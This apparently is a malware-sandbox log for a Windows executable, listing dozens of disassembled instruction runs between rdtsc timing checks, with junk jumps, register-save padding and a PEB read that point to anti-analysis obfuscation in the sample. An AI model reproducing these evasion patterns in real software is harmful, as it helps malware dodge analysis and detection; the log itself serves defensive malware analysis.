Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E900BD second address: 6E900E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub esp, 18h 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 mov di, cx 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 mov ax, 68B3h 0x0000001b mov esi, 18FADD0Fh 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 mov ecx, edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E900E4 second address: 6E90148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F6FA127EBE8h 0x00000009 jmp 00007F6FA127EBE2h 0x0000000e pop esi 0x0000000f popad 0x00000010 xchg eax, ebx 0x00000011 jmp 00007F6FA127EBE1h 0x00000016 mov ebx, dword ptr [eax+10h] 0x00000019 pushad 0x0000001a mov eax, 361D6C63h 0x0000001f mov cx, 6BBFh 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F6FA127EBE1h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90148 second address: 6E901BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F6FA0B89518h 0x00000010 xchg eax, esi 0x00000011 jmp 00007F6FA0B89510h 0x00000016 mov esi, dword ptr [775606ECh] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F6FA0B8950Dh 0x00000025 sub eax, 7C047026h 0x0000002b jmp 00007F6FA0B89511h 0x00000030 popfd 0x00000031 call 00007F6FA0B89510h 0x00000036 pop esi 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E901BD second address: 6E901C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E901C3 second address: 6E90270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007F6FA0B89510h 0x00000012 jne 00007F6FA0B8A3C3h 0x00000018 pushad 0x00000019 jmp 00007F6FA0B8950Eh 0x0000001e mov ch, 18h 0x00000020 popad 0x00000021 push ecx 0x00000022 pushad 0x00000023 mov dx, cx 0x00000026 mov edx, esi 0x00000028 popad 0x00000029 mov dword ptr [esp], edi 0x0000002c jmp 00007F6FA0B8950Eh 0x00000031 call dword ptr [77530B60h] 0x00000037 mov eax, 756AE5E0h 0x0000003c ret 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F6FA0B8950Eh 0x00000044 add cl, FFFFFFE8h 0x00000047 jmp 00007F6FA0B8950Bh 0x0000004c popfd 0x0000004d pushfd 0x0000004e jmp 00007F6FA0B89518h 0x00000053 or cx, 4348h 0x00000058 jmp 00007F6FA0B8950Bh 0x0000005d popfd 0x0000005e popad 0x0000005f push 00000044h 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 movsx edx, si 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90270 second address: 6E90275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90275 second address: 6E9029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F6FA0B8950Bh 0x00000012 pop eax 0x00000013 push edx 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9029F second address: 6E902CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6FA127EBE7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E902CF second address: 6E9031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA0B8950Fh 0x00000009 or ax, EDAEh 0x0000000e jmp 00007F6FA0B89519h 0x00000013 popfd 0x00000014 call 00007F6FA0B89510h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9031A second address: 6E90320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90320 second address: 6E90324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90324 second address: 6E9035F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a mov al, bh 0x0000000c push eax 0x0000000d mov cl, dh 0x0000000f pop eax 0x00000010 popad 0x00000011 push dword ptr [eax] 0x00000013 jmp 00007F6FA127EBE9h 0x00000018 mov eax, dword ptr fs:[00000030h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 movsx edi, si 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9035F second address: 6E90364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90402 second address: 6E90406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90406 second address: 6E90423 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89519h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90423 second address: 6E904E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov ebx, 6C5EAE40h 0x00000011 pushfd 0x00000012 jmp 00007F6FA127EBE9h 0x00000017 adc cx, B246h 0x0000001c jmp 00007F6FA127EBE1h 0x00000021 popfd 0x00000022 popad 0x00000023 mov dword ptr [esi], edi 0x00000025 jmp 00007F6FA127EBDEh 0x0000002a mov dword ptr [esi+04h], eax 0x0000002d jmp 00007F6FA127EBE0h 0x00000032 mov dword ptr [esi+08h], eax 0x00000035 jmp 00007F6FA127EBE0h 0x0000003a mov dword ptr [esi+0Ch], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F6FA127EBDDh 0x00000046 xor si, CBB6h 0x0000004b jmp 00007F6FA127EBE1h 0x00000050 popfd 0x00000051 jmp 00007F6FA127EBE0h 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E904E4 second address: 6E904EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E904EA second address: 6E904EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E904EE second address: 6E90567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+4Ch] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F6FA0B89513h 0x00000015 add ch, 0000004Eh 0x00000018 jmp 00007F6FA0B89519h 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esi+10h], eax 0x00000022 pushad 0x00000023 mov ecx, 420A8CF3h 0x00000028 push eax 0x00000029 mov ecx, edi 0x0000002b pop edi 0x0000002c popad 0x0000002d mov eax, dword ptr [ebx+50h] 0x00000030 jmp 00007F6FA0B8950Eh 0x00000035 mov dword ptr [esi+14h], eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6FA0B8950Ah 0x00000041 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90567 second address: 6E90576 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90576 second address: 6E9059D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov ecx, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+54h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6FA0B89518h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9059D second address: 6E905AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA127EBDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E905AF second address: 6E905B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E905B3 second address: 6E905EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b jmp 00007F6FA127EBE7h 0x00000010 mov eax, dword ptr [ebx+58h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6FA127EBE0h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E905EC second address: 6E905F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E905F2 second address: 6E905F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E905F8 second address: 6E905FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E905FC second address: 6E90600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90600 second address: 6E90617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, 0C1BDD54h 0x00000013 mov cx, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90617 second address: 6E90643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6FA127EBE4h 0x00000009 or ecx, 0B597108h 0x0000000f jmp 00007F6FA127EBDBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90643 second address: 6E906C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+5Ch] 0x0000000a jmp 00007F6FA0B89514h 0x0000000f mov dword ptr [esi+20h], eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F6FA0B8950Eh 0x00000019 xor ax, 2698h 0x0000001e jmp 00007F6FA0B8950Bh 0x00000023 popfd 0x00000024 mov dh, ah 0x00000026 popad 0x00000027 mov eax, dword ptr [ebx+60h] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F6FA0B8950Ch 0x00000033 adc ax, D0F8h 0x00000038 jmp 00007F6FA0B8950Bh 0x0000003d popfd 0x0000003e call 00007F6FA0B89518h 0x00000043 pop ecx 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E906C6 second address: 6E906F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA127EBE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E906F6 second address: 6E90738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6FA0B8950Fh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+64h] 0x00000011 jmp 00007F6FA0B89515h 0x00000016 mov dword ptr [esi+28h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6FA0B8950Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90738 second address: 6E9073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9073E second address: 6E90742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90742 second address: 6E90785 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+68h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F6FA127EBE2h 0x00000017 xor ax, C408h 0x0000001c jmp 00007F6FA127EBDBh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90785 second address: 6E907CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89518h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6FA0B89512h 0x0000000e popad 0x0000000f mov dword ptr [esi+2Ch], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F6FA0B8950Dh 0x0000001a mov edi, eax 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E907CA second address: 6E907D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E907D0 second address: 6E907D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E907D4 second address: 6E907F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6FA127EBDEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E907F0 second address: 6E90839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F6FA0B89516h 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6FA0B89517h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90839 second address: 6E9083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9083F second address: 6E9085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+32h], ax 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 mov edi, eax 0x00000012 popad 0x00000013 mov eax, dword ptr [ebx+0000008Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9085E second address: 6E90864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90864 second address: 6E908CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c jmp 00007F6FA0B89510h 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 jmp 00007F6FA0B89510h 0x00000019 mov dword ptr [esi+38h], eax 0x0000001c pushad 0x0000001d mov di, ax 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F6FA0B89516h 0x00000028 popad 0x00000029 popad 0x0000002a mov eax, dword ptr [ebx+1Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E908CD second address: 6E908D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E908D1 second address: 6E908D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E908D7 second address: 6E90900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6FA127EBDAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90900 second address: 6E90906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90906 second address: 6E90918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90918 second address: 6E9091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9091C second address: 6E90920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90920 second address: 6E90926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90926 second address: 6E9093E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA127EBE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9093E second address: 6E90958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+40h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90958 second address: 6E9095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E9095E second address: 6E90964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90964 second address: 6E909B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+00000080h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F6FA127EBDDh 0x00000019 pushfd 0x0000001a jmp 00007F6FA127EBE0h 0x0000001f and cx, 3548h 0x00000024 jmp 00007F6FA127EBDBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E909B7 second address: 6E909CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA0B89514h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E909CF second address: 6E90A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b mov al, bl 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F6FA127EBE0h 0x00000014 mov dword ptr [esp], eax 0x00000017 pushad 0x00000018 mov dh, ch 0x0000001a mov cx, di 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90A00 second address: 6E90A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B8950Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90A11 second address: 6E90A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90A17 second address: 6E90A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA0B89510h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90A34 second address: 6E90A3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90AEC second address: 6E90AFE instructions: 0x00000000 rdtsc 0x00000002 mov si, 8BB7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90AFE second address: 6E90B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90B02 second address: 6E90B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90B06 second address: 6E90B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: 6E90B0C second address: 6E90B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6FA0B8950Eh 0x00000013 jmp 00007F6FA0B89515h 0x00000018 popfd 0x00000019 mov eax, 77B94777h 0x0000001e popad 0x0000001f lea eax, dword ptr [ebx+78h] 0x00000022 jmp 00007F6FA0B8950Ah 0x00000027 push 00000001h 0x00000029 pushad 0x0000002a mov di, si 0x0000002d mov ax, 9DB9h 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 mov bl, 3Ah 0x0000003a popad 0x0000003b rdtsc
